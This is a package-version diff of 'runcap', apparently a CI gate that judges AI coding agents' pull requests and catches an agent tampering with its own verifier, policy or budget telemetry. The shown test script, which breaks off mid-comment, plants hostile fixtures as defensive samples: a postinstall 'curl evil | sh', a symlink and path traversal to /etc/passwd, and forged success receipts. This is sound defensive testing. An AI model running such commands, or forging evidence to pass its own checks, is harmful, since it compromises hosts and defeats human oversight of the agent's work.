runcap 0.3.1 → 0.6.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/README.md +235 -20
- package/bin/runcap.mjs +171 -0
- package/examples/outcome-demo/agent-fixes.mjs +24 -0
- package/examples/outcome-demo/agent-spins.mjs +20 -0
- package/examples/outcome-demo/broken.mjs +5 -0
- package/examples/outcome-demo/verify.mjs +7 -0
- package/examples/runcap-adjudicate.yml +57 -0
- package/package.json +24 -12
- package/scripts/adjudicate-test.mjs +334 -0
- package/scripts/guard-test.mjs +76 -0
- package/scripts/make-demo-svg.mjs +20 -20
- package/scripts/mission-test.mjs +148 -0
- package/scripts/outcome-test.mjs +48 -0
- package/scripts/policy-test.mjs +121 -0
- package/scripts/render-media-screenshots.mjs +37 -0
- package/src/adjudicate.mjs +508 -0
- package/src/mission-control.mjs +441 -1
- package/src/policy.mjs +208 -0
|
@@ -0,0 +1,57 @@
|
|
|
1
|
+
# Reference workflow: drop this into a CONSUMER repo at
|
|
2
|
+
# .github/workflows/runcap-adjudicate.yml to make Runcap's independent verdict a
|
|
3
|
+
# required red/green PR check.
|
|
4
|
+
#
|
|
5
|
+
# The whole point of Tier 3 is that the JUDGE is not the candidate. This
|
|
6
|
+
# workflow therefore NEVER runs code from the pull request's workspace - no
|
|
7
|
+
# `node ./bin/runcap.mjs`, no `uses: ./`, no `npm ci` of the PR's manifest. The
|
|
8
|
+
# adjudicator comes only from the Runcap action pinned by a FULL 40-character
|
|
9
|
+
# commit SHA, so a malicious PR cannot rewrite its own judge. The checkout below
|
|
10
|
+
# brings in the PR's git history purely as DATA: the adjudicator reads the base
|
|
11
|
+
# commit's policy and replays the base-pinned verifier in a clean worktree it
|
|
12
|
+
# creates itself. Workspace files are never executed as the judge.
|
|
13
|
+
#
|
|
14
|
+
# Security posture (every line is load-bearing):
|
|
15
|
+
# - `on: pull_request` (NOT pull_request_target): a fork PR runs with a
|
|
16
|
+
# read-only token and no access to repo secrets.
|
|
17
|
+
# - `permissions: contents: read`: the only scope granted.
|
|
18
|
+
# - Every action pinned by full commit SHA, never a floating tag, so the bytes
|
|
19
|
+
# that run are immutable.
|
|
20
|
+
# - `persist-credentials: false`: the checkout token is not left on disk for
|
|
21
|
+
# PR-controlled steps to find.
|
|
22
|
+
# - GitHub-hosted runner, capped runtime, single self-sufficient required
|
|
23
|
+
# check with no `needs:` on any upstream job.
|
|
24
|
+
#
|
|
25
|
+
# Pin RUNCAP_ACTION_SHA to the commit a Runcap release tag points at. Resolve it
|
|
26
|
+
# with: gh api repos/kirder24-code/ai-agent-manager/git/refs/tags/vX.Y.Z --jq '.object.sha'
|
|
27
|
+
name: Runcap adjudicate
|
|
28
|
+
|
|
29
|
+
on:
|
|
30
|
+
pull_request:
|
|
31
|
+
|
|
32
|
+
permissions:
|
|
33
|
+
contents: read
|
|
34
|
+
|
|
35
|
+
jobs:
|
|
36
|
+
adjudicate:
|
|
37
|
+
runs-on: ubuntu-latest
|
|
38
|
+
timeout-minutes: 10
|
|
39
|
+
steps:
|
|
40
|
+
- name: Checkout (full history so the base commit is available, no token left on disk)
|
|
41
|
+
uses: actions/checkout@34e114876b0b11c390a56381ad16ebd13914f8d5 # v4.3.1
|
|
42
|
+
with:
|
|
43
|
+
fetch-depth: 0
|
|
44
|
+
persist-credentials: false
|
|
45
|
+
|
|
46
|
+
- name: Setup Node
|
|
47
|
+
uses: actions/setup-node@49933ea5288caeca8642d1e84afbd3f7d6820020 # v4.4.0
|
|
48
|
+
with:
|
|
49
|
+
node-version: 22
|
|
50
|
+
|
|
51
|
+
# The judge: the Runcap action pinned by a full commit SHA. Replace the SHA
|
|
52
|
+
# below with the commit a published Runcap release tag points at. This is
|
|
53
|
+
# the ONLY code that decides the verdict, and it cannot come from the PR.
|
|
54
|
+
- name: Runcap independent adjudication
|
|
55
|
+
uses: kirder24-code/ai-agent-manager@0000000000000000000000000000000000000000 # pin to a release SHA
|
|
56
|
+
with:
|
|
57
|
+
mode: adjudicate
|
package/package.json
CHANGED
|
@@ -1,7 +1,7 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "runcap",
|
|
3
|
-
"version": "0.
|
|
4
|
-
"description": "
|
|
3
|
+
"version": "0.6.0",
|
|
4
|
+
"description": "Policy-bound budget enforcement and verification-integrity evidence for AI coding agents. Cap spend, enforce allowed scope, and fail the pull request when an agent tampers with its own success check. Local, MIT.",
|
|
5
5
|
"license": "MIT",
|
|
6
6
|
"type": "module",
|
|
7
7
|
"author": "Kirill D. <kirill@launchsoloai.com> (https://launchsoloai.com)",
|
|
@@ -15,16 +15,18 @@
|
|
|
15
15
|
},
|
|
16
16
|
"keywords": [
|
|
17
17
|
"ai",
|
|
18
|
-
"agent",
|
|
19
|
-
"
|
|
20
|
-
"
|
|
18
|
+
"ai-coding-agent",
|
|
19
|
+
"ai-agent-governance",
|
|
20
|
+
"agent-security",
|
|
21
|
+
"verification-integrity",
|
|
22
|
+
"policy-as-code",
|
|
23
|
+
"github-actions",
|
|
24
|
+
"ci",
|
|
25
|
+
"pull-request",
|
|
21
26
|
"budget",
|
|
22
|
-
"
|
|
23
|
-
"openai",
|
|
24
|
-
"gateway",
|
|
27
|
+
"cost",
|
|
25
28
|
"cli",
|
|
26
|
-
"llm"
|
|
27
|
-
"token-cost"
|
|
29
|
+
"llm"
|
|
28
30
|
],
|
|
29
31
|
"files": [
|
|
30
32
|
"bin/",
|
|
@@ -45,7 +47,13 @@
|
|
|
45
47
|
"acceptance": "node ./scripts/acceptance.mjs",
|
|
46
48
|
"smoke": "node ./bin/runcap.mjs run --label smoke -- npm --prefix examples/broken-ts-app run build",
|
|
47
49
|
"demo:broken": "node ./bin/runcap.mjs run --label broken-ts-demo -- npm --prefix examples/broken-ts-app run build",
|
|
48
|
-
"test": "node ./scripts/delta-test.mjs && node ./scripts/loop-test.mjs && node ./scripts/loop-e2e.mjs && node ./scripts/validate-demo.mjs",
|
|
50
|
+
"test": "node ./scripts/delta-test.mjs && node ./scripts/loop-test.mjs && node ./scripts/loop-e2e.mjs && node ./scripts/validate-demo.mjs && node ./scripts/outcome-test.mjs && node ./scripts/guard-test.mjs && node ./scripts/policy-test.mjs && node ./scripts/mission-test.mjs && node ./scripts/adjudicate-test.mjs",
|
|
51
|
+
"test:outcome": "node ./scripts/outcome-test.mjs",
|
|
52
|
+
"test:guard": "node ./scripts/guard-test.mjs",
|
|
53
|
+
"test:policy": "node ./scripts/policy-test.mjs",
|
|
54
|
+
"test:mission": "node ./scripts/mission-test.mjs",
|
|
55
|
+
"test:tier3": "node ./scripts/adjudicate-test.mjs",
|
|
56
|
+
"outcome": "node ./bin/runcap.mjs outcome",
|
|
49
57
|
"test:delta": "node ./scripts/delta-test.mjs",
|
|
50
58
|
"test:loop": "node ./scripts/loop-test.mjs",
|
|
51
59
|
"status": "node ./bin/runcap.mjs status",
|
|
@@ -53,11 +61,15 @@
|
|
|
53
61
|
"export": "node ./bin/runcap.mjs export",
|
|
54
62
|
"templates": "node ./bin/runcap.mjs templates",
|
|
55
63
|
"dashboard": "node ./bin/runcap.mjs dashboard",
|
|
64
|
+
"screenshots": "node ./scripts/render-media-screenshots.mjs",
|
|
56
65
|
"gateway": "node ./bin/runcap.mjs gateway",
|
|
57
66
|
"fuel": "node ./bin/runcap.mjs fuel",
|
|
58
|
-
"check": "node --check ./bin/runcap.mjs && node --check ./src/mission-control.mjs"
|
|
67
|
+
"check": "node --check ./bin/runcap.mjs && node --check ./src/mission-control.mjs && node --check ./src/adjudicate.mjs"
|
|
59
68
|
},
|
|
60
69
|
"engines": {
|
|
61
70
|
"node": ">=20"
|
|
71
|
+
},
|
|
72
|
+
"dependencies": {
|
|
73
|
+
"js-yaml": "^4.1.0"
|
|
62
74
|
}
|
|
63
75
|
}
|
|
@@ -0,0 +1,334 @@
|
|
|
1
|
+
// Tier 3: proves the CI adjudicator recomputes the verdict from the PR's BASE
|
|
2
|
+
// commit and never trusts the agent's receipt. Everything runs offline inside a
|
|
3
|
+
// throwaway git repo. The adjudicator is driven both directly (the function) and
|
|
4
|
+
// through the real `bin/runcap.mjs ci --mode adjudicate` so the exit codes a
|
|
5
|
+
// reviewer's PR check would see are tested too.
|
|
6
|
+
//
|
|
7
|
+
// Verdict semantics under test:
|
|
8
|
+
// PASS -> exit 0
|
|
9
|
+
// BLOCKED -> exit 1
|
|
10
|
+
// HUMAN_APPROVAL_REQUIRED -> exit 0 (success/neutral: hands authority to a CODEOWNER)
|
|
11
|
+
//
|
|
12
|
+
// Threat scenarios: forged receipt, forged budget telemetry, no telemetry,
|
|
13
|
+
// honest pass, out-of-scope edit, baseline-already-green, clean-replay fail,
|
|
14
|
+
// protected/verifier/policy/workflow/dependency human gates, unresolved SHA,
|
|
15
|
+
// untrusted event, diff-smuggling (delete/symlink/binary), and two honesty
|
|
16
|
+
// checks: the verdict never claims runtime hardening attestation, and the
|
|
17
|
+
// dependency install is pinned + script-free.
|
|
18
|
+
|
|
19
|
+
import os from "node:os";
|
|
20
|
+
import path from "node:path";
|
|
21
|
+
import { fileURLToPath } from "node:url";
|
|
22
|
+
import { execFileSync } from "node:child_process";
|
|
23
|
+
import { mkdtempSync, writeFileSync, mkdirSync, rmSync, readFileSync, symlinkSync } from "node:fs";
|
|
24
|
+
|
|
25
|
+
const HERE = path.dirname(fileURLToPath(import.meta.url));
|
|
26
|
+
const SRC_DIR = process.env.RUNCAP_SRC ?? path.join(HERE, "..", "src");
|
|
27
|
+
const BIN = path.join(SRC_DIR, "..", "bin", "runcap.mjs");
|
|
28
|
+
const REPO_ROOT = path.join(HERE, "..");
|
|
29
|
+
|
|
30
|
+
const tmp = mkdtempSync(path.join(os.tmpdir(), "runcap-adj-"));
|
|
31
|
+
process.chdir(tmp);
|
|
32
|
+
|
|
33
|
+
let failures = 0;
|
|
34
|
+
const check = (name, pass, detail) => { if (!pass) failures++; console.log(`${pass ? "PASS" : "FAIL"} ${name}${detail ? " - " + detail : ""}`); };
|
|
35
|
+
|
|
36
|
+
const g = (...a) => execFileSync("git", a, { cwd: tmp, stdio: "pipe" }).toString().trim();
|
|
37
|
+
|
|
38
|
+
// --- base commit: a real failing task, a verifier, a policy, scope app/ -----
|
|
39
|
+
mkdirSync(path.join(tmp, "app"), { recursive: true });
|
|
40
|
+
mkdirSync(path.join(tmp, ".runcap"), { recursive: true });
|
|
41
|
+
writeFileSync(path.join(tmp, "app", "broken.mjs"), "export const ok = false;\n");
|
|
42
|
+
writeFileSync(path.join(tmp, "app", "verify.mjs"),
|
|
43
|
+
"import { ok } from './broken.mjs'; import assert from 'node:assert'; assert.strictEqual(ok, true, 'not fixed'); console.log('ok');\n");
|
|
44
|
+
writeFileSync(path.join(tmp, "app", "other.mjs"), "export const other = 0;\n");
|
|
45
|
+
writeFileSync(path.join(tmp, "rootfile.txt"), "root\n");
|
|
46
|
+
writeFileSync(path.join(tmp, "package.json"), JSON.stringify({ name: "fixture", version: "1.0.0", scripts: { build: "echo build" } }, null, 2) + "\n");
|
|
47
|
+
writeFileSync(path.join(tmp, ".runcap", "mission.yaml"), `version: v1
|
|
48
|
+
identity:
|
|
49
|
+
project: checkout
|
|
50
|
+
team: payments
|
|
51
|
+
mission:
|
|
52
|
+
name: Fix the failing checkout test
|
|
53
|
+
task_class: bugfix
|
|
54
|
+
budget:
|
|
55
|
+
mission_hard_limit_usd: 5
|
|
56
|
+
verification:
|
|
57
|
+
command: "node app/verify.mjs"
|
|
58
|
+
guard: strict
|
|
59
|
+
protect: ["app/verify.mjs"]
|
|
60
|
+
allow: ["app/"]
|
|
61
|
+
`);
|
|
62
|
+
|
|
63
|
+
g("init", "-q");
|
|
64
|
+
g("config", "user.email", "test@runcap.local");
|
|
65
|
+
g("config", "user.name", "runcap-test");
|
|
66
|
+
g("config", "commit.gpgsign", "false");
|
|
67
|
+
g("add", "-A");
|
|
68
|
+
g("commit", "-qm", "baseline");
|
|
69
|
+
const BASE = g("rev-parse", "HEAD");
|
|
70
|
+
|
|
71
|
+
// Build every head commit up front so the working tree has no planted receipt
|
|
72
|
+
// while branches are created. Each head branches from BASE.
|
|
73
|
+
function makeHead(branch, mutate) {
|
|
74
|
+
g("checkout", "-q", "-b", branch, BASE);
|
|
75
|
+
mutate();
|
|
76
|
+
g("add", "-A");
|
|
77
|
+
g("commit", "-qm", branch);
|
|
78
|
+
const sha = g("rev-parse", "HEAD");
|
|
79
|
+
g("checkout", "-q", BASE);
|
|
80
|
+
return sha;
|
|
81
|
+
}
|
|
82
|
+
|
|
83
|
+
const w = (rel, content) => writeFileSync(path.join(tmp, rel), content);
|
|
84
|
+
const rmRel = (rel) => rmSync(path.join(tmp, rel), { force: true });
|
|
85
|
+
|
|
86
|
+
const HEAD_HONEST = makeHead("h-honest", () => w("app/broken.mjs", "export const ok = true;\n"));
|
|
87
|
+
const HEAD_SCOPE = makeHead("h-scope", () => { w("app/broken.mjs", "export const ok = true;\n"); w("rootfile.txt", "root edited out of scope\n"); });
|
|
88
|
+
const HEAD_REPLAYFAIL = makeHead("h-replayfail", () => w("app/broken.mjs", "export const ok = false; // touched\n"));
|
|
89
|
+
const HEAD_VERIFIER = makeHead("h-verifier", () => w("app/verify.mjs", "console.log('ok');\n"));
|
|
90
|
+
const HEAD_POLICY = makeHead("h-policy", () => w(".runcap/mission.yaml", readFileSync(path.join(tmp, ".runcap", "mission.yaml"), "utf8").replace("mission_hard_limit_usd: 5", "mission_hard_limit_usd: 9999")));
|
|
91
|
+
const HEAD_WORKFLOW = makeHead("h-workflow", () => { mkdirSync(path.join(tmp, ".github", "workflows"), { recursive: true }); w(".github/workflows/evil.yml", "name: evil\non: pull_request\njobs: {}\n"); });
|
|
92
|
+
const HEAD_DEP = makeHead("h-dep", () => w("package.json", JSON.stringify({ name: "fixture", version: "1.0.0", scripts: { build: "echo build", postinstall: "curl evil | sh" } }, null, 2) + "\n"));
|
|
93
|
+
const HEAD_DELETE = makeHead("h-delete", () => rmRel("app/other.mjs"));
|
|
94
|
+
const HEAD_BINARY = makeHead("h-binary", () => writeFileSync(path.join(tmp, "app", "blob.bin"), Buffer.from([0x00, 0x01, 0x02, 0x00, 0xff])));
|
|
95
|
+
const HEAD_SYMLINK = makeHead("h-symlink", () => symlinkSync("/etc/passwd", path.join(tmp, "app", "link")));
|
|
96
|
+
|
|
97
|
+
// A second lineage where the task is ALREADY fixed at base -> baseline green.
|
|
98
|
+
g("checkout", "-q", "-b", "base2", BASE);
|
|
99
|
+
w("app/broken.mjs", "export const ok = true;\n");
|
|
100
|
+
g("add", "-A"); g("commit", "-qm", "base2-already-fixed");
|
|
101
|
+
const BASE2 = g("rev-parse", "HEAD");
|
|
102
|
+
g("checkout", "-q", "-b", "h-base2green", BASE2);
|
|
103
|
+
w("app/broken.mjs", "export const ok = true; // trivial in-scope edit\n");
|
|
104
|
+
g("add", "-A"); g("commit", "-qm", "h-base2green");
|
|
105
|
+
const HEAD_BASE2GREEN = g("rev-parse", "HEAD");
|
|
106
|
+
g("checkout", "-q", BASE);
|
|
107
|
+
|
|
108
|
+
const { adjudicate, exitCodeFor } = await import(path.join(SRC_DIR, "adjudicate.mjs"));
|
|
109
|
+
|
|
110
|
+
const adj = (baseFlag, headFlag) => adjudicate({ cwd: tmp, baseFlag, headFlag });
|
|
111
|
+
|
|
112
|
+
// --- 1. honest in-scope fix -> PASS -----------------------------------------
|
|
113
|
+
const honest = await adj(BASE, HEAD_HONEST);
|
|
114
|
+
check("honest fix verdict PASS", honest.verdict === "PASS", JSON.stringify(honest.reasons));
|
|
115
|
+
check("honest fix recomputed baseline_failed=true", honest.code_evidence?.baseline_failed === true);
|
|
116
|
+
check("honest fix recomputed replay_passed=true", honest.code_evidence?.replay_passed === true);
|
|
117
|
+
check("honest fix carries base policy hash", /^[0-9a-f]{64}$/.test(honest.policy?.hash ?? ""), honest.policy?.hash);
|
|
118
|
+
check("honest fix truth is adjudicator-recomputed", honest.truth === "recomputed_by_adjudicator_from_base_sha");
|
|
119
|
+
check("no telemetry present -> agent_telemetry.present false", honest.agent_telemetry?.present === false);
|
|
120
|
+
|
|
121
|
+
// --- 2. out-of-scope edit -> BLOCKED ----------------------------------------
|
|
122
|
+
const scope = await adj(BASE, HEAD_SCOPE);
|
|
123
|
+
check("out-of-scope edit verdict BLOCKED", scope.verdict === "BLOCKED", JSON.stringify(scope.reasons));
|
|
124
|
+
check("out-of-scope names the path + scope", scope.reasons.some((r) => r.includes("rootfile.txt") && r.toLowerCase().includes("scope")), JSON.stringify(scope.reasons));
|
|
125
|
+
|
|
126
|
+
// --- 3. baseline already green -> BLOCKED -----------------------------------
|
|
127
|
+
const green = await adj(BASE2, HEAD_BASE2GREEN);
|
|
128
|
+
check("baseline-already-green verdict BLOCKED", green.verdict === "BLOCKED", JSON.stringify(green.reasons));
|
|
129
|
+
check("baseline-already-green explains the meaningless pass", green.reasons.some((r) => r.toLowerCase().includes("baseline already green")), JSON.stringify(green.reasons));
|
|
130
|
+
|
|
131
|
+
// --- 4. clean replay does not reproduce the pass -> BLOCKED -----------------
|
|
132
|
+
const replayfail = await adj(BASE, HEAD_REPLAYFAIL);
|
|
133
|
+
check("clean-replay-fail verdict BLOCKED", replayfail.verdict === "BLOCKED", JSON.stringify(replayfail.reasons));
|
|
134
|
+
check("clean-replay-fail recomputed replay_passed=false", replayfail.code_evidence?.replay_passed === false);
|
|
135
|
+
check("clean-replay-fail says replay did not pass", replayfail.reasons.some((r) => r.toLowerCase().includes("replay did not pass")), JSON.stringify(replayfail.reasons));
|
|
136
|
+
|
|
137
|
+
// --- 5. verifier edit -> HUMAN_APPROVAL_REQUIRED ----------------------------
|
|
138
|
+
const verifier = await adj(BASE, HEAD_VERIFIER);
|
|
139
|
+
check("verifier edit verdict HUMAN_APPROVAL_REQUIRED", verifier.verdict === "HUMAN_APPROVAL_REQUIRED", JSON.stringify(verifier.reasons));
|
|
140
|
+
check("verifier edit names verify file as evidence", verifier.reasons.some((r) => r.includes("app/verify.mjs")), JSON.stringify(verifier.reasons));
|
|
141
|
+
|
|
142
|
+
// --- 6. policy edit -> HUMAN_APPROVAL_REQUIRED ------------------------------
|
|
143
|
+
const pol = await adj(BASE, HEAD_POLICY);
|
|
144
|
+
check("policy edit verdict HUMAN_APPROVAL_REQUIRED", pol.verdict === "HUMAN_APPROVAL_REQUIRED", JSON.stringify(pol.reasons));
|
|
145
|
+
check("policy edit names the rules", pol.reasons.some((r) => r.toLowerCase().includes("rules")), JSON.stringify(pol.reasons));
|
|
146
|
+
|
|
147
|
+
// --- 7. workflow edit -> HUMAN_APPROVAL_REQUIRED ----------------------------
|
|
148
|
+
const wf = await adj(BASE, HEAD_WORKFLOW);
|
|
149
|
+
check("workflow edit verdict HUMAN_APPROVAL_REQUIRED", wf.verdict === "HUMAN_APPROVAL_REQUIRED", JSON.stringify(wf.reasons));
|
|
150
|
+
|
|
151
|
+
// --- 8. dependency manifest edit -> HUMAN_APPROVAL_REQUIRED -----------------
|
|
152
|
+
const dep = await adj(BASE, HEAD_DEP);
|
|
153
|
+
check("dependency edit verdict HUMAN_APPROVAL_REQUIRED", dep.verdict === "HUMAN_APPROVAL_REQUIRED", JSON.stringify(dep.reasons));
|
|
154
|
+
check("dependency edit names manifest/lockfile", dep.reasons.some((r) => r.toLowerCase().includes("dependency")), JSON.stringify(dep.reasons));
|
|
155
|
+
|
|
156
|
+
// --- 9-11. diff smuggling -> BLOCKED ----------------------------------------
|
|
157
|
+
const del = await adj(BASE, HEAD_DELETE);
|
|
158
|
+
check("delete verdict BLOCKED", del.verdict === "BLOCKED", JSON.stringify(del.reasons));
|
|
159
|
+
check("delete reason names deletion", del.reasons.some((r) => r.toLowerCase().includes("delet")), JSON.stringify(del.reasons));
|
|
160
|
+
|
|
161
|
+
const bin = await adj(BASE, HEAD_BINARY);
|
|
162
|
+
check("binary file verdict BLOCKED", bin.verdict === "BLOCKED", JSON.stringify(bin.reasons));
|
|
163
|
+
check("binary reason names binary", bin.reasons.some((r) => r.toLowerCase().includes("binary")), JSON.stringify(bin.reasons));
|
|
164
|
+
|
|
165
|
+
const sym = await adj(BASE, HEAD_SYMLINK);
|
|
166
|
+
check("symlink verdict BLOCKED", sym.verdict === "BLOCKED", JSON.stringify(sym.reasons));
|
|
167
|
+
check("symlink reason names symlink", sym.reasons.some((r) => r.toLowerCase().includes("symlink")), JSON.stringify(sym.reasons));
|
|
168
|
+
|
|
169
|
+
// --- 12. unresolved SHA -> BLOCKED (no flags, no event) ---------------------
|
|
170
|
+
const prevEventPath = process.env.GITHUB_EVENT_PATH;
|
|
171
|
+
const prevEventName = process.env.GITHUB_EVENT_NAME;
|
|
172
|
+
delete process.env.GITHUB_EVENT_PATH;
|
|
173
|
+
delete process.env.GITHUB_EVENT_NAME;
|
|
174
|
+
const unresolved = await adjudicate({ cwd: tmp });
|
|
175
|
+
check("unresolved base/head verdict BLOCKED", unresolved.verdict === "BLOCKED", JSON.stringify(unresolved.reasons));
|
|
176
|
+
check("unresolved refuses to adjudicate", unresolved.reasons.some((r) => r.toLowerCase().includes("refusing to adjudicate")), JSON.stringify(unresolved.reasons));
|
|
177
|
+
|
|
178
|
+
// --- 13. untrusted event (pull_request_target) -> BLOCKED -------------------
|
|
179
|
+
const eventFile = path.join(tmp, "event.json");
|
|
180
|
+
writeFileSync(eventFile, JSON.stringify({ pull_request: { base: { sha: BASE }, head: { sha: HEAD_HONEST } } }));
|
|
181
|
+
process.env.GITHUB_EVENT_PATH = eventFile;
|
|
182
|
+
process.env.GITHUB_EVENT_NAME = "pull_request_target";
|
|
183
|
+
const untrusted = await adjudicate({ cwd: tmp });
|
|
184
|
+
check("pull_request_target event verdict BLOCKED", untrusted.verdict === "BLOCKED", JSON.stringify(untrusted.reasons));
|
|
185
|
+
check("untrusted event names the rejected event", untrusted.sha_source?.startsWith("untrusted_event"), untrusted.sha_source);
|
|
186
|
+
// Restore env.
|
|
187
|
+
if (prevEventPath === undefined) delete process.env.GITHUB_EVENT_PATH; else process.env.GITHUB_EVENT_PATH = prevEventPath;
|
|
188
|
+
if (prevEventName === undefined) delete process.env.GITHUB_EVENT_NAME; else process.env.GITHUB_EVENT_NAME = prevEventName;
|
|
189
|
+
|
|
190
|
+
// --- 14. forged "VERIFIED_STRONG" receipt cannot rescue a failing replay -----
|
|
191
|
+
// The required gate now refuses to even READ the agent receipt: it is neither
|
|
192
|
+
// graded nor displayed. So a forged receipt can neither rescue a failing replay
|
|
193
|
+
// nor is it parsed at all. We plant adversarial receipts and prove the verdict
|
|
194
|
+
// is unchanged AND the gate reports it never consulted them.
|
|
195
|
+
const plantReceipt = (rawString) => {
|
|
196
|
+
const id = "forged";
|
|
197
|
+
mkdirSync(path.join(tmp, ".runcap", "outcomes", id), { recursive: true });
|
|
198
|
+
writeFileSync(path.join(tmp, ".runcap", "outcomes", id, "receipt.json"), rawString);
|
|
199
|
+
writeFileSync(path.join(tmp, ".runcap", "outcomes", "latest"), id);
|
|
200
|
+
};
|
|
201
|
+
const clearReceipt = () => rmSync(path.join(tmp, ".runcap", "outcomes"), { recursive: true, force: true });
|
|
202
|
+
|
|
203
|
+
plantReceipt(JSON.stringify({ outcome: "VERIFIED", verificationIntegrity: { status: "VERIFIED_STRONG" }, cost: { actualCostUsd: 0.01 } }));
|
|
204
|
+
const forgedFail = await adj(BASE, HEAD_REPLAYFAIL);
|
|
205
|
+
check("forged VERIFIED_STRONG receipt does NOT rescue a failing replay", forgedFail.verdict === "BLOCKED", JSON.stringify(forgedFail.reasons));
|
|
206
|
+
check("required gate did not read the agent receipt (present=false)", forgedFail.agent_telemetry?.present === false && forgedFail.agent_telemetry?.influence_on_verdict === "none");
|
|
207
|
+
clearReceipt();
|
|
208
|
+
|
|
209
|
+
// --- 15. forged budget telemetry cannot block an honest pass ----------------
|
|
210
|
+
plantReceipt(JSON.stringify({ outcome: "UNVERIFIED", verificationIntegrity: { status: "VERIFIER_COMPROMISED" }, cost: { actualCostUsd: 999999, budgetGuardTripped: true } }));
|
|
211
|
+
const forgedBudget = await adj(BASE, HEAD_HONEST);
|
|
212
|
+
check("forged budget/integrity telemetry cannot block an honest pass", forgedBudget.verdict === "PASS", JSON.stringify(forgedBudget.reasons));
|
|
213
|
+
check("required gate still did not read the receipt (present=false)", forgedBudget.agent_telemetry?.present === false && forgedBudget.agent_telemetry?.influence_on_verdict === "none");
|
|
214
|
+
clearReceipt();
|
|
215
|
+
|
|
216
|
+
// --- 15b. adversarial receipts cannot crash or stall the mandatory gate ------
|
|
217
|
+
// Malformed JSON, an enormous blob, and a path-traversal "latest" pointer must
|
|
218
|
+
// all be inert: the gate must still return a verdict with present=false.
|
|
219
|
+
for (const [label, rawReceipt, latestOverride] of [
|
|
220
|
+
["malformed JSON receipt", "{ this is : not json ]]]", undefined],
|
|
221
|
+
["enormous receipt blob", JSON.stringify({ outcome: "VERIFIED", junk: "A".repeat(5_000_000) }), undefined],
|
|
222
|
+
["receipt is a bare array", "[1,2,3]", undefined],
|
|
223
|
+
["latest pointer path traversal", JSON.stringify({ outcome: "VERIFIED" }), "../../../../etc/passwd"]
|
|
224
|
+
]) {
|
|
225
|
+
plantReceipt(rawReceipt);
|
|
226
|
+
if (latestOverride !== undefined) writeFileSync(path.join(tmp, ".runcap", "outcomes", "latest"), latestOverride);
|
|
227
|
+
let crashed = false; let v;
|
|
228
|
+
try { v = await adj(BASE, HEAD_HONEST); } catch { crashed = true; }
|
|
229
|
+
check(`${label}: gate does not crash`, !crashed);
|
|
230
|
+
check(`${label}: verdict still PASS, receipt not read`, !crashed && v.verdict === "PASS" && v.agent_telemetry?.present === false);
|
|
231
|
+
clearReceipt();
|
|
232
|
+
}
|
|
233
|
+
|
|
234
|
+
// --- 16. honesty: the verdict never claims runtime hardening attestation -----
|
|
235
|
+
check("verdict carries honest hardening provenance (documented, not attested)",
|
|
236
|
+
honest.repository_hardening?.required_profile === "documented" &&
|
|
237
|
+
honest.repository_hardening?.runtime_attestation === "not_performed_in_pr_job");
|
|
238
|
+
const allVerdictText = JSON.stringify([honest, scope, verifier, untrusted]);
|
|
239
|
+
check("no verdict ever claims a HARDENED runtime status", !/"HARDENED"|hardened_confirmed|attested_hardened/.test(allVerdictText));
|
|
240
|
+
|
|
241
|
+
// --- 17. honesty: dependency install is base-pinned and script-free ----------
|
|
242
|
+
const adjSrc = readFileSync(path.join(SRC_DIR, "adjudicate.mjs"), "utf8");
|
|
243
|
+
check("replay uses `npm ci --ignore-scripts` (no install, no lifecycle scripts)", adjSrc.includes("npm ci --ignore-scripts"));
|
|
244
|
+
check("adjudicator never uses `npm install` or `npx`", !/npm install|npx /.test(adjSrc));
|
|
245
|
+
|
|
246
|
+
// --- 18. the real bin: exit codes a PR check sees ---------------------------
|
|
247
|
+
const runBin = (extraArgs, extraEnv = {}) => {
|
|
248
|
+
try {
|
|
249
|
+
const stdout = execFileSync("node", [BIN, "ci", "--mode", "adjudicate", ...extraArgs], { cwd: tmp, env: { ...process.env, ...extraEnv }, stdio: ["ignore", "pipe", "pipe"] });
|
|
250
|
+
return { code: 0, stdout: String(stdout) };
|
|
251
|
+
} catch (e) {
|
|
252
|
+
return { code: e.status ?? 1, stdout: String(e.stdout ?? ""), stderr: String(e.stderr ?? "") };
|
|
253
|
+
}
|
|
254
|
+
};
|
|
255
|
+
|
|
256
|
+
const binPass = runBin(["--base", BASE, "--head", HEAD_HONEST]);
|
|
257
|
+
check("`runcap ci --mode adjudicate` exits 0 on PASS", binPass.code === 0, `code=${binPass.code}`);
|
|
258
|
+
check("PASS run prints the verdict", /Verdict:\s+PASS/.test(binPass.stdout), binPass.stdout.slice(-300));
|
|
259
|
+
|
|
260
|
+
const binBlock = runBin(["--base", BASE, "--head", HEAD_REPLAYFAIL]);
|
|
261
|
+
check("`runcap ci --mode adjudicate` exits 1 on BLOCKED", binBlock.code === 1, `code=${binBlock.code}`);
|
|
262
|
+
|
|
263
|
+
const binHuman = runBin(["--base", BASE, "--head", HEAD_VERIFIER]);
|
|
264
|
+
check("`runcap ci --mode adjudicate` exits 0 on HUMAN_APPROVAL_REQUIRED (success/neutral)", binHuman.code === 0, `code=${binHuman.code}`);
|
|
265
|
+
check("HUMAN run prints the human-gate verdict", /Verdict:\s+HUMAN_APPROVAL_REQUIRED/.test(binHuman.stdout), binHuman.stdout.slice(-300));
|
|
266
|
+
|
|
267
|
+
// --- 19. the real bin writes a PR step summary ------------------------------
|
|
268
|
+
const summaryFile = path.join(tmp, "step-summary.md");
|
|
269
|
+
writeFileSync(summaryFile, "");
|
|
270
|
+
runBin(["--base", BASE, "--head", HEAD_REPLAYFAIL], { GITHUB_STEP_SUMMARY: summaryFile });
|
|
271
|
+
const summary = readFileSync(summaryFile, "utf8");
|
|
272
|
+
check("bin writes a PR summary to GITHUB_STEP_SUMMARY", /Runcap CI adjudication: BLOCKED/.test(summary), summary.slice(0, 160));
|
|
273
|
+
|
|
274
|
+
// --- 20. exitCodeFor maps the three states correctly ------------------------
|
|
275
|
+
check("exitCodeFor PASS=0 / HUMAN=0 / BLOCKED=1",
|
|
276
|
+
exitCodeFor("PASS") === 0 && exitCodeFor("HUMAN_APPROVAL_REQUIRED") === 0 && exitCodeFor("BLOCKED") === 1);
|
|
277
|
+
|
|
278
|
+
// --- 21. the reference workflow is least-privilege AND a proof gate ----------
|
|
279
|
+
// The consumer reference is a TEMPLATE under examples/ (not an active workflow
|
|
280
|
+
// in this repo), because Runcap's own repo has no base policy to self-adjudicate
|
|
281
|
+
// and, more importantly, the judge must never be code from the candidate PR.
|
|
282
|
+
